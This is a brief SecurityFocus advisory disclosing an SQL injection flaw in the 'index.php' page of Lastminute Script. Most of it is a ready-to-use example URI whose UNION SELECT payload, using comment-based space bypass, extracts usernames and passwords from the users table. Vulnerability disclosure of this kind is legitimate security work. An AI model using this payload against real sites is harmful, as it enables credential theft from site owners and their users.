Lastminute Script 'index.php' SQL Injection Vulnerability

Attackers can exploit this issue with a browser.

The following example URI is available:

http://www.example.com/index.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/CONVERT(CONCAT(name,0x3a,password,0x3C62723E)/**/using/**/latin1),2,3,4/**/FROM/**/users/*


 

Privacy Statement
Copyright 2010, SecurityFocus